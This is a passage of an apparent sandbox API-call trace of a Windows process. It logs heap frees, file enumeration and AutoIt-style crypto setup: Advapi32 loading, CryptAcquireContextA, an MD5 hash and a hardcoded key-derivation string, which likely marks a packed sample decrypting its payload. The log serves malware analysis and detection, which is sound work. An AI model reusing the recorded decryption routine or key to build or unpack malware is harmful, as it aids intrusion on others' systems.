ftLastWriteTime.dwLowDateTime=0xaa0bc220, ftLastWriteTime.dwHighDateTime=0x1d5eb86, nFileSizeHigh=0x0, nFileSizeLow=0xcb31, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="yzzjzdDz73JlAs1uEFCr.avi", cAlternateFileName="YZZJZD~1.AVI")) returned 0x41ac500 [0104.177] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.177] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.178] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.178] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.178] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.179] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.179] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0104.179] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0104.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.179] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0104.180] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.180] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0104.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0104.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0104.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ec8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0104.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0104.182] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0104.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0104.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0104.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0104.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0104.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0104.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0104.182] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0104.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0104.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0104.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0104.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0104.183] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5360) returned 1 [0104.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0104.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0104.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0104.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0104.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0104.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.185] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.185] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.185] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0104.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0104.186] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0104.186] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0104.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0104.186] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.186] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0104.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0104.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cab68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0104.186] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0104.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, 